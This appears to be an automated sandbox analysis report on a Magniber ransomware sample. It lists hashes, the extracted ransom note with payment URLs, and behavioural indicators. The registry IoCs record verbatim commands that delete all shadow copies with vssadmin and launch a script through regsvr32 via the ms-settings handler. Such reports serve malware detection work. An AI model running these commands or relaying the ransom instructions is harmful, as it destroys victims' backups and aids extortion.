magniber | 3589d019564eedff37d7fd5efbc465144ca6a991fd23fadd9191ff169fa38ef0

Analysis

max time kernel
52s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
11-03-2024 02:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bfa86847c33dfb1ece4323369a271f7a.dll
Size

38KB
MD5

bfa86847c33dfb1ece4323369a271f7a
SHA1

87866e440b4e9ef1039df2ce78a278f4ac22ceb1
SHA256

3589d019564eedff37d7fd5efbc465144ca6a991fd23fadd9191ff169fa38ef0
SHA512

2b0018f3be33cb984e8cebcf6ee6443883776284fba8f502cc8ac0571267aad0cc4226f85bc411e649b122ef1793f3aa0bc488abb19b5239c547553f50f68c52
SSDEEP

768:Vbmx6Yq3MT9sxNNEIj4v7JuYtcxRdf9Ijsg1b1pKo/OYGI:VbmDvsNE+4zJuYi3df9yLk6dd

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f8ec869032e4d8102agenhtaat.r45ucj44wxpb2pf2kewwscy5pcpzsx6wnqsa53xhpexxazksajplfmid.onion/genhtaat Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f8ec869032e4d8102agenhtaat.datause.monster/genhtaat http://f8ec869032e4d8102agenhtaat.hidtook.club/genhtaat http://f8ec869032e4d8102agenhtaat.agofair.fit/genhtaat http://f8ec869032e4d8102agenhtaat.abeing.website/genhtaat Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://f8ec869032e4d8102agenhtaat.r45ucj44wxpb2pf2kewwscy5pcpzsx6wnqsa53xhpexxazksajplfmid.onion/genhtaat

http://f8ec869032e4d8102agenhtaat.datause.monster/genhtaat

http://f8ec869032e4d8102agenhtaat.hidtook.club/genhtaat

http://f8ec869032e4d8102agenhtaat.agofair.fit/genhtaat

http://f8ec869032e4d8102agenhtaat.abeing.website/genhtaat

Signatures

Detect magniber ransomware 3 IoCs

resource	yara_rule
behavioral2/memory/376-1-0x0000026AA3B30000-0x0000026AA4372000-memory.dmp	family_magniber
behavioral2/memory/2396-20-0x00000252882C0000-0x00000252882C5000-memory.dmp	family_magniber
behavioral2/files/0x0007000000023277-527.dat	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5408	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5400	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5424	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5432	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5416	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5392	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5384	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5376	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5368	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3452	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	300	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6080	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6088	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5604	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5580	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5384	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3760	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1760	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3324	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3664	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5560	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5376	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5580	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3812	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	308	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3308	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5276	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5372	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5748	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5144	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5584	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5900	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2652	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	220	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4824	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5536	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6104	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5112	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6116	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5496	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2468	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4440	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1480	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5920	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5376	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5776	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5896	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5720	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5772	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4404	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1136	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4848	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4156	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4524	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5892	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3772	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6008	5268	cmd.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4688	5268	vssadmin.exe	130
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2668	5268	vssadmin.exe	130

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (85) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 23 IoCs

description	pid	Process	procid_target
PID 376 set thread context of 2396	376	rundll32.exe	41
PID 376 set thread context of 2404	376	rundll32.exe	42
PID 376 set thread context of 2508	376	rundll32.exe	44
PID 376 set thread context of 3300	376	rundll32.exe	55
PID 376 set thread context of 3696	376	rundll32.exe	57
PID 376 set thread context of 3892	376	rundll32.exe	58
PID 376 set thread context of 4036	376	rundll32.exe	59
PID 376 set thread context of 1076	376	rundll32.exe	60
PID 376 set thread context of 3416	376	rundll32.exe	61
PID 376 set thread context of 4164	376	rundll32.exe	62
PID 376 set thread context of 4648	376	rundll32.exe	64
PID 376 set thread context of 4708	376	rundll32.exe	74
PID 376 set thread context of 4508	376	rundll32.exe	75
PID 376 set thread context of 684	376	rundll32.exe	77
PID 376 set thread context of 2496	376	rundll32.exe	78
PID 376 set thread context of 2280	376	rundll32.exe	79
PID 376 set thread context of 408	376	rundll32.exe	80
PID 376 set thread context of 3436	376	rundll32.exe	81
PID 376 set thread context of 2524	376	rundll32.exe	83
PID 376 set thread context of 4288	376	rundll32.exe	84
PID 376 set thread context of 4688	376	rundll32.exe	89
PID 376 set thread context of 3708	376	rundll32.exe	90
PID 376 set thread context of 4572	376	rundll32.exe	91

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\%PUBLIC%\readme.txt	msedge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	backgroundTaskHost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	backgroundTaskHost.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe

Interacts with shadow copies 2 TTPs 39 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
5384	vssadmin.exe
3308	vssadmin.exe
5748	vssadmin.exe
5536	vssadmin.exe
5604	vssadmin.exe
5112	vssadmin.exe
5776	vssadmin.exe
1136	vssadmin.exe
4524	vssadmin.exe
5892	vssadmin.exe
4688	vssadmin.exe
5416	vssadmin.exe
3324	vssadmin.exe
5376	vssadmin.exe
5584	vssadmin.exe
5424	vssadmin.exe
5432	vssadmin.exe
3452	vssadmin.exe
300	vssadmin.exe
6080	vssadmin.exe
220	vssadmin.exe
5580	vssadmin.exe
5900	vssadmin.exe
4404	vssadmin.exe
2668	vssadmin.exe
5416	vssadmin.exe
6116	vssadmin.exe
1480	vssadmin.exe
5720	vssadmin.exe
5772	vssadmin.exe
6088	vssadmin.exe
3664	vssadmin.exe
4440	vssadmin.exe
5896	vssadmin.exe
1576	vssadmin.exe
2652	vssadmin.exe
4824	vssadmin.exe
6104	vssadmin.exe
5920	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Internet Explorer\IESettingSync	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies registry class 48 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	backgroundTaskHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\MuiCache	backgroundTaskHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4964	notepad.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
376	rundll32.exe
376	rundll32.exe
2496	msedge.exe
2496	msedge.exe
2496	msedge.exe
2496	msedge.exe
2496	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3300	Explorer.EXE
2508	taskhostw.exe

Suspicious behavior: MapViewOfSection 23 IoCs

pid	Process
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe
376	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	4540	wmic.exe
Token: SeSecurityPrivilege	4540	wmic.exe
Token: SeTakeOwnershipPrivilege	4540	wmic.exe
Token: SeLoadDriverPrivilege	4540	wmic.exe
Token: SeSystemProfilePrivilege	4540	wmic.exe
Token: SeSystemtimePrivilege	4540	wmic.exe
Token: SeProfSingleProcessPrivilege	4540	wmic.exe
Token: SeIncBasePriorityPrivilege	4540	wmic.exe
Token: SeCreatePagefilePrivilege	4540	wmic.exe
Token: SeBackupPrivilege	4540	wmic.exe
Token: SeRestorePrivilege	4540	wmic.exe
Token: SeShutdownPrivilege	4540	wmic.exe
Token: SeDebugPrivilege	4540	wmic.exe
Token: SeSystemEnvironmentPrivilege	4540	wmic.exe
Token: SeRemoteShutdownPrivilege	4540	wmic.exe
Token: SeUndockPrivilege	4540	wmic.exe
Token: SeManageVolumePrivilege	4540	wmic.exe
Token: 33	4540	wmic.exe
Token: 34	4540	wmic.exe
Token: 35	4540	wmic.exe
Token: 36	4540	wmic.exe
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	4124	wmic.exe
Token: SeSecurityPrivilege	4124	wmic.exe
Token: SeTakeOwnershipPrivilege	4124	wmic.exe
Token: SeLoadDriverPrivilege	4124	wmic.exe
Token: SeSystemProfilePrivilege	4124	wmic.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1076 wrote to memory of 4964	1076	RuntimeBroker.exe	103
PID 1076 wrote to memory of 4964	1076	RuntimeBroker.exe	103
PID 1076 wrote to memory of 3896	1076	RuntimeBroker.exe	104
PID 1076 wrote to memory of 3896	1076	RuntimeBroker.exe	104
PID 1076 wrote to memory of 4540	1076	RuntimeBroker.exe	275
